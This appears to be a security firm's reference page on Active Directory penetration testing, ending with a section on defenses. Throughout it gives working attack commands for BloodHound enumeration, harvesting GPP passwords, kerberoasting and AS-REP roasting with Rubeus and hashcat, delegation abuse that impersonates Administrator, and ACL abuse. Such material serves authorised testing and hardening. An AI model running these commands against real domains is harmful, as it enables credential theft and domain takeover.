New The 2026 Continuous Validation Methodology Paper is now available. Read the paper →
Featured · 1 Offensive Tradecraft

Active Directory Pentest.

AD attack surface end-to-end: enumeration, Kerberos, ACL abuse, GPO weaponization, the Tier-0 chase — including the internal-engagement playbook from foothold to domain dominance.

Enumeration (any authenticated user)

  • BloodHound collection. SharpHound -c All,GPOLocalGroup from a domain-joined host; or bloodhound-python -c All -u user -p pass -d domain.local -ns DC_IP from Linux. Always run with --ldapfilter to scope under heavy environments.
  • User and computer enum. ldapsearch -x -h DC -b "dc=domain,dc=local" "(objectClass=user)". Look for description fields containing passwords — still the single most common AD finding.
  • SPN inventory. setspn -Q */* or GetUserSPNs.py. Service accounts here are kerberoast candidates.
  • GPO inspection. Get-GPO -All, walk \\domain\SYSVOL\domain\Policies\ for cpassword in Groups.xml (GPP creds, decryptable).

Kerberos abuse

  1. Kerberoasting. Rubeus.exe kerberoast /outfile:hashes.txt or GetUserSPNs.py -request. Crack hashcat mode 13100 with rockyou + best64.rule. Service accounts with passwords < 14 chars typically fall.
  2. ASREP-roasting. Rubeus.exe asreproast or GetNPUsers.py -no-pass -usersfile users.txt for accounts with DONT_REQUIRE_PREAUTH. Hashcat mode 18200.
  3. Unconstrained delegation abuse. Computer accounts with TRUSTED_FOR_DELEGATION → coerce DC auth via PetitPotam or printer bug → captured TGT.
  4. Constrained delegation (S4U2Self/Proxy). Computer/user with msDS-AllowedToDelegateTo → request TGS as any user to the configured SPN → Rubeus.exe s4u /user:WEB$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/dc01.
  5. Resource-based constrained delegation. Write access to msDS-AllowedToActOnBehalfOfOtherIdentity on a target computer → add attacker-controlled machine account → impersonate any user to that target.

ACL abuse — dangerous rights

  • GenericAll on user. Reset password or set SPN → kerberoast.
  • WriteDACL on object. Grant self GenericAll → all of the above.
  • WriteOwner. Take ownership → WriteDACL → GenericAll.
  • ForceChangePassword on user. Set-DomainUserPassword (PowerView). Loud but fast.
  • AddMember on group. Especially Domain Admins, Enterprise Admins, Schema Admins, and any tier-0 group.
  • GenericWrite on computer. Set RBCD on target → impersonate any user via S4U.

Defenses

  • gMSAs for service accounts. 240-byte rotated passwords defeat kerberoasting categorically.
  • PRE_AUTH required on every account. Audit (&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304)) regularly.
  • Tier-0 isolation. Domain Admins log in only from PAWs. No Tier-0 secret ever cached on a Tier-1 host.
  • LDAP signing + channel binding. Defeats relay attacks against DCs.
  • SMB signing required. Defeats NTLM relay across the file-server fleet.
  • Disable spooler service on every DC. Removes the printer-bug delegation primitive.
Rule of thumbPath to DA is almost always shorter in BloodHound than you'd expect. Run it on day one of any internal engagement, before any other tooling. The graph tells you which 3–4 of the next 50 things to try.

Related notes in this domain

From reference to evidence

Run this against your own environment.